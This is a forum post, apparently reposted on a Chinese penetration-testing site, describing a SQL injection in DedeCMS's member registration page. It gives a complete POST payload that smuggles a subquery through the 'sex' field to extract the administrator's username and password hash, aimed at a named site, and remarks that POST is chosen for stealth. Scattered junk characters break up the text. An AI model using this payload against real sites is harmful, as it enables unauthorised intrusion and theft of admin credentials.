中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
8 `& v0 o# Q& k# \+ ~3 x+ O5 c- L1 S
简要描述:
0 s5 y' D V, R& Q. z
) Z% b; }* Z' K* G. K/ R' n# W1 O
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
; Z9 \/ d' W: ^, @
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
& m( U% G& [: a3 O& U" @2 l. X& v3 |
详细说明:跟这个漏洞
6 {, x# B5 q; \3 d
. S2 @0 c) b& u* l5 m
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
( Y e% B) y$ k" d5 f
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
( N) |' m0 X2 W9 X m
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
" M. f9 ^! o1 k" U
% W) _4 J+ |& y! S0 a, }; F' m4 B
www.political-security.com/member/reg_new.php
' a' r; B/ j( j6 J; }! I9 f1 }1 T ^
! g. c( g% y+ o* L; Q9 H4 F
POST
8 c# J8 H* M1 t) A7 G8 E* |# ~
X$ ^$ U& `6 R- W3 u
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
% s' v4 H( R% Y
userid=c4rp3nt3r&uname=c4rp3nt3r
0 I) W! O% F- }) D
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
" ^8 b# A- J" ?' x g" Q5 w7 G# q
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
& l7 b1 `' k- |0 I2 l6 f9 R0 i
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
- g* L& A g. x( k
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2